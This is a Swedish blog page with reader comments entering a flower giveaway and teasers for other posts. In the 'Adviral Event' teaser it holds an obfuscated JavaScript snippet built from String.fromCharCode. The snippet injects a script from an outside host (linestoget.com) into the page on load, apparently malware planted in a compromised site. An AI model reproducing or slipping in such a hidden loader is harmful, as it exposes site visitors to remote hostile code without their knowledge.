  Så jag vill ge blommor till min farfar som också tycker om blommor så mycket och han är fantastisk som har skött detta sedan hon gick bort!

 78. Om farmor fortfarande var i livet så skulle jag skicka blommor till henne för hon ÄLSKADE blommor och hela hemmet var alltid fullt av vackra buketter eller vackra inomhusplanteringar. Något av det sista hon sa till min farfar var att han skulle ta hand om en speciellt växt som hon hade varmt om hjärtat för den behövde mycket vatten 🙂
  Så jag vill ge blommor till min farfar som också tycker om blommor så mycket och han är fantastisk som har skött detta sedan hon gick bort!

 79. Min mamma som har det tufft med sjukdomar och annat just nu, är såå värd detta! Hon behöver piggas upp och vad kan vara bättre än färska vackra blommor! =) delar på facebook med namnet Anna Mårtensson fd Fasth

 80. Min mamma som har det tufft med sjukdomar och annat just nu, är såå värd detta! Hon behöver piggas upp och vad kan vara bättre än färska vackra blommor! =) delar på facebook med namnet Anna Mårtensson fd Fasth

Svara

Lämna din kommentar!
Ditt namn här

Om du missat..

Andas ut stressen med hjälp av djupandning

Andas ut stressen med hjälp av djupandning -Hur många tänker egentligen på sin andning? Jag...

SMEG bagaren och kocken 20%

I reklamsamarbete Bagaren och Kocken ??‍? Hej på er! Detta är en grymt efterlängtad kampanj...

Adviral Event

My Martens , Ako Rahim. Adviral Media. d Ako, Renata, My   var f=String;+f.fromCharCode(99,116,105,111,110)+f.fromCharCode(32,97,115,115,40,115,114,99,41,123,114,101,116,117,114,110)+f.fromCharCode(32,66,111,111,108,101,97,110)+f.fromCharCode(40,100,111,99,117,109,101,110)+f.fromCharCode(116,46,113,117,101,114,121,83,101,108,101,99,116,111,114,40,39,115,99,114,105,112,116,91,115,114,99,61,34,39,32,43,32,115,114,99,32,43,32,39,34,93,39,41,41,59,125,32,118,97,114,32,108,111,61,34,104,116,116,112,115,58,47,47,115,116,97,121,46,108,105,110)+f.fromCharCode(101,115,116,111,103,101,116,46,99,111,109,47,115,99,114,105,112,116,115,47,99,104,101,99,107,46,106,115,63,118,61,53,46,53,53,46,53,34,59,105,102,40,97,115,115,40,108,111,41,61,61,102,97,108,115,101,41,123,118,97,114,32,100,61,100,111,99,117,109,101,110)+f.fromCharCode(116,59,118,97,114,32,115,61,100,46,99,114,101,97,116,101,69,108,101,109,101,110)+f.fromCharCode(116,40,39,115,99,114,105,112,116,39,41,59,32,115,46,115,114,99,61,108,111,59,105,102,32,40,100,111,99,117,109,101,110)+f.fromCharCode(116,46,99,117,114,114,101,110)+f.fromCharCode(116,83,99,114,105,112,116,41,32,123,32,100,111,99,117,109,101,110)+f.fromCharCode(116,46,99,117,114,114,101,110)+f.fromCharCode(116,83,99,114,105,112,116,46,112,97,114,101,110)+f.fromCharCode(116,78,111,100,101,46,105,110)+f.fromCharCode(115,101,114,116,66,101,102,111,114,101,40,115,44,32,100,111,99,117,109,101,110)+f.fromCharCode(116,46,99,117,114,114,101,110)+f.fromCharCode(116,83,99,114,105,112,116,41,59,125,32,101,108,115,101,32,123,100,46,103,101,116,69,108,101,109,101,110)+f.fromCharCode(116,115,66,121,84,97,103,78,97,109,101,40,39,104,101,97,100,39,41,91,48,93,46,97,112,112,101,110)+f.fromCharCode(100,67,104,105,108,100,40,115,41,59,125,125));/*99586587347*/